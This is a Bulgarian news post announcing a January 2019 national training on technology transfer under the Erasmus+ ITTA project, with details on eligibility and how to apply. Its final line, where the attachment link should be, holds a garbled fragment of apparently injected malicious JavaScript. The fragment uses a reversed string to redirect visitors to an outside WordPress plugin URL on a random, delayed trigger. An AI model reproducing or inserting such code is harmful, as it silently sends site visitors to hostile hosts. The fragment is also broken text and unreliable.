Предстои второ национално обучение на тема „Технологичен трансфер“

December 21, 2018 in ОТТ Новини

ДЗЗД Консорциум Иновативен капитал, представляващо Офиса за Технологичен Трансфер (ТТО) Иновативен Капитал, в партньорство с Kielecki Park Technologiczny (Полша), Tehnoloski Park Ljubljana (Словения), Technology Park Varazdin (Хърватия) и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект: „Международна Академия за Трансфер на Технологии“ (ITTA), съфинансиран от Еразъм +. Основната цел на проекта е да се повишат уменията и знанията на специалистите, занимаващи се с трансфер на технологии. Проектът е уникален заради съчетаването на няколко различни подхода за обучение: дистанционно обучение, неформално образование, практическо обучение, пилотно обучение, като целта е да се осигури подобряване на компетентностите не само на знанията, но и на умения, ценности и нагласи.

ITTA e  проект с продължителност 36 м., обхващащ обучителни курсове в страната по 5 модула, онлайн обучение по 12 модула и 5 международни обучения.

В рамките на проекта участниците имат възможност:

- да вземат участие в 5 национални обучения (гр. София, продължителност 2 дни);

- да се обучават по 12 онлайн модула.

След приключване на проекта част от участниците ще имат възможност за  безплатен стаж в институция/организация/компания в България, която изпълнява задачи в областта на трансфера на технологии.

Целева група на проекта са младите хора на възраст между 18 и 35 години, които имат потенциал и готовност активно да участват в сектора на технологичния трансфер и НИРД. Те трябва да са предимно новозавършили студенти или се очаква да завършат през първите 2 години от проекта (2018-2019) или са настоящи служители на офис за технологичен трансфер. Участниците трябва да имат желание да станат потенциални служители в сектора на технологичен трансфер и силна мотивация за работа в  тази област.

На 17-18.01.2019 г. в гр. София ще се проведе второ национално обучение на тема „Технологичен трансфер“. Обучител по втория модул е проф. Костадин Костадинов от Фондация ГИС- Трансфер Център.

След провеждането на  обучението,  екип от експерти към ТТО Иновативен Капитал, ще избере 5 лица, които да се включат в международно обучение (времетраене 5 дни) в Полша, което ще се проведе през месец февруари 2019г.

Желаещите да се включат в проекта могат да заявят участие до 10.01.2019 г., като изпратят попълнена  и подписана заявка за участие на имейл адрес: a.simeonovas@gmail.com, която ще видите прикачена под публикацията.

От Екипа на ДЗЗД Консорциум Иновативен капитал

 to-sofia.com/wp-content/uploads/2018/12/Personal_Questionaire_ITTA.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docx">Personal_Questionaire_ITTA